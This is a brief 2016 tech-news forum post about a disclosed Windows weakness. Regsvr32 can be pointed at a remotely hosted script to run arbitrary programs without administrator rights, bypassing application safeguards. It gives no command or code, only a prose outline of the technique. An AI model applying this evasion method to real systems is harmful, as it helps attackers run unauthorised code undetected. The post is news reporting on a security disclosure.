Today's Hard|Forum Post
Today's Hard|Forum Post

Monday April 25, 2016

Exploit Gets Around Windows' App Security Safeguards

It's crazy that no one caught this vulnerability until now. No need for administrator access, no protection of any sort, just point Regsvr32 to a remote file and presto, you can make a system run any app you want. eek!

Researcher Casey Smith has discovered a vulnerability in Windows that gets around this barrier. If you tell Regsvr32 to point to a remotely hosted file (such as a script), you can make a system run whichever app you want -- just what hackers and virus writers are looking for. It's stealthy, too, as it doesn't require administrator access or give itself away through registry changes.